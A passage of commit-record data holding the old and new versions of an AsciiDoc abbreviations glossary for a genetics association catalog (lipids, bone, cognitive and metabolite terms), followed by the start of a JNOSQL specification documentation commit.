mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: 
paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75\u00ad for latest exam\n\n\nppfefrat: percent predicted FEF25-75\u00ad\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FEC\/FEE: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine\n\n\nSM-16: 
docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nsTie-2: soluble receptor Tie-2\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HD\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","old_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nAA: African-American\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? 
fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint 
count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nET-1: Endothelin-1\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: beta-cell function\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor 
\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentration\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenylglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall
\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: phospholipid\n\n\nPLT: platelets\n\n\npltadp: platelet aggregation (ADP-induced)\n\n\npltcoll: platelet aggregation (collagen-induced)\n\n\nPP: pulse pressure\n\n\nppfef: percent predicted FEF25-75 for latest exam\n\n\nppfefrat: percent predicted FEF25-75\/FVC for latest exam\n\n\nppfvc: percent predicted FVC for latest exam\n\n\nppfev1: percent predicted FEV1 for latest exam\n\n\nppFEV1\/FVC\/FEF: percent predicted FEV1\/FVC\/FEF\n\n\nppratio: percent predicted FEV1\/FVC for latest exam\n\n\nPRM: pattern recognition memory\n\n\nPROP: propylthiouracil solution\n\n\nPS: protein S\n\n\nPSC: primary sclerosing cholangitis\n\n\nPT: prothrombin time\n\n\nPUFA: polyunsaturated fatty acids\n\n=== Q\n\nQC: quality control\n\n\nQUICKI: fasting serum quantitative insulin sensitivity check index\n\n=== R\n\nRA: Rheumatoid arthritis\n\n\nRANTES: fasting serum regulated upon activation, normal T-cell expressed and secreted\n\n\nRAVLT-dr: Rey\u2019s Auditory Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n\nRBC: red blood cell\n\n\nRBCC: red blood cell count\n\n\nRDW: red cell distribution width\n\n\nRQmax: maximum respiratory quotient during treadmill fitness test\n\n\nRVP: rapid visual processing\n\n\nRW: reflected wave amplitude\n\n\nRWLTA: reflected wave amplitude, long-term average\n\n=== S\n\nS2EHR: Stage 2 exercise heart rate\n\n\nS2ESBP: stage 2 exercise systolic blood pressure\n\n\nserum TG: serum total triglyceride content\n\n\nSAS: Simpson-Angus Scale\n\n\nSBP: systolic blood pressure\n\n\nSBPLTA: systolic blood pressure, long-term average\n\n\nsCR: serum creatinine\n\n\nSCZ and BD: Schizophrenia and Bipolar disorder\n\n\ns.d.: standard deviation\n\n\nSE: sleep efficiency\n\n\nSG: Glucose effectiveness\n\n\nShaftW1: Shaft width combined\n\n\nShaftW1f: shaft width in females\n\n\nShaftZ1rf: shaft section modulus in females\n\n\nShaftZ1R: shaft section modulus\n\n\nSHBG: sex hormone binding globulin\n\n\nSI: SI from FSIGT\n\n\nsICAM-1: fasting serum soluble intercellular adhesion molecule-1\n\n\nsIL-6R: soluble interleukin-6 receptor\n\n\nSim: Similarities\n\n\nSleep RQ: respiratory quotient during sleep\n\n\nSLE: systemic lupus erythematosus\n\n\nSM-1: butyrylcarnitine \/ propionylcarnitine\n\n\nSM-2: N-acetylornithine\n\n\nSM-3: 1-arachidonoylglycero phosphoethanolamine \/ 1-linoleoylglycerophospho-ethanolamine\n\n\nSM-4: bilirubin (E,E) \/ oleoylcarnitine\n\n\nSM-5: hexanoylcarnitine \/ oleate (18:1n9)\n\n\nSM-6: myristate (14:0) \/ myristoleate (14:1n5)\n\n\nSM-7: 1-methylxanthine \/ 4-acetamidobutanoate\n\n\nSM-8: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-9: 10-nonadecenoate (19:1n9) \/ 10-undecenoate (11:1n1)\n\n\nSM-10: eicosenoate (20:1n9 or 11) \/ tetradecanedioate\n\n\nSM-11: ADpSGEGDFXAEGGGVR \/ ADSGEGDFXAEGGGVR\n\n\nSM-12: ADSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-13: androsterone sulfate \/ epiandrosterone sulfate\n\n\nSM-14: ADpSGEGDFXAEGGGVR \/ DSGEGDFXAEGGGVR\n\n\nSM-15: 1-eicosatrienoylglycero-phosphocholine \/ 1-linoleoylglycero phosphocholine
\n\n\nSM-16: docosahexaenoate (DHA; 22:6n3) \/ eicosapentaenoate (EPA; 20:5n3)\n\n\nSM-17: 3-(4-hydroxyphenyl)lactate \/ isovalerylcarnitine\n\n\nSMKAGE: age of initiation (years)\n\n\nSMKDU: duration (years)\n\n\nSM: sphingomyelin\n\n\nSpc: spectrum\n\n\nSP-D: surfactant protein D\n\n\nSPEED: processing speed\n\n\nSRM: spatial recognition memory\n\n\nSSP: spatial span\n\n\nsTfR: Soluble Transferrin Receptor\n\n\nStr: strict\n\n\nSVD: small-vessel disease\n\n\nSWM: spatial working memory\n\n=== T\n\nTAT: Total adipose tissue area\n\n\nTC: total cholesterol\n\n\nTEE: 24-h total energy expenditure\n\n\ntFPG: 28 year time averaged fasting plasma glucose (FPG)\n\n\nTG: triglycerides\n\n\nTGF-b1: transforming growth factor beta 1\n\n\nTG\/HDLC: fasting serum triglycerides\/high density lipoprotein cholesterol\n\n\nTIDN: Type 1 diabetes diabetic nephropathy\n\n\nTotal PS: Total Protein S\n\n\nTotal T3: fasting serum triiodothyronine\n\n\nTotal T4: fasting serum thyroxine\n\n\nTP: total protein\n\n\ntPA: tissue plasminogen activator\n\n\nTNFA: tumor necrosis factor alpha\n\n\nTRBMD: Trochanter bone mineral density\n\n\nTRBMDm: Trochanter bone mineral density males\n\n\nTSH: thyroid stimulating hormone\n\n\nTyr: Tyrosine\n\n=== U\n\nUAE: urinary albumin excretion\n\n=== V\n\nVal: Valine\n\n\nvBMD: volumetric bone mineral density\n\n\nVitD250H: Vitamin D plasma 25(OH)-D\n\n\nVitkPhylloq: Vitamin K plasma phylloquinone\n\n\nVLDL: very-low-density lipoprotein\n\n\nVLDL-D: Mean diameter for VLDL particles\n\n\nVO2max: maximum oxygen consumption during treadmill fitness test\n\n\nVOS: velocity of sound\n\n\nVPWL-dr: delayed recall for visually presented word list\n\n\nVrb: verbal\n\n\nVRM: verbal recall\n\n\nvWF: von Willebrand factor\n\n=== W\n\nWBC: white blood cell\n\n\nWC: waist circumference\n\n\nWCadjBMI: WC adjustment for BMI\n\n\nWF: weight fluctuation\n\n\nWGHS: Women's Genome Health Study\n\n\nWHR: waist hip ratio\n\n\nWHRadjBMI: WHR adjustment for BMI\n\n\nWL-dr: word list delayed recall\n\n\nWRAT: Wide-Range Achievement Test\n\n=== XYZ\n\nXL-HDL-CE: The cholesterol ester content of extra large HDL\n\n\nXL-HDL-TG: Triglycerides in very large HDL\n\n\nXXL-VLDL-P: extremely large VLDL particles\n\n\nYKL-40: (Chitinase 3-like 1) protein levels\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6888d9da5583dfd4756bf75ed41fb49e3273204a","subject":"improves main behind spec documentation","message":"improves main behind spec documentation\n","repos":"JNOSQL\/diana","old_file":"specification\/src\/main\/asciidoc\/mainbehindspec.adoc","new_file":"specification\/src\/main\/asciidoc\/mainbehindspec.adoc","new_contents":"\/\/\n\/\/ Copyright (c) 2018 Ot\u00e1vio Santana and others\n\/\/ All rights reserved. This program and the accompanying materials\n\/\/ are made available under the terms of the Eclipse Public License v1.0\n\/\/ and Apache License v2.0 which accompanies this distribution.\n\/\/ The Eclipse Public License is available at http:\/\/www.eclipse.org\/legal\/epl-v10.html\n\/\/ and the Apache License v2.0 is available at http:\/\/www.opensource.org\/licenses\/apache2.0.php.\n\/\/\n\/\/ You may elect to redistribute this code under either of these licenses.\n\/\/\n\/\/ Contributors:\n\/\/\n\/\/ Otavio Santana\n\n== The main idea behind the API\n\nThe divide-and-conquer strategy decreases the complexity of systems within modules or structures. These structure levels split responsibility and make maintenance and replaceability more clear.
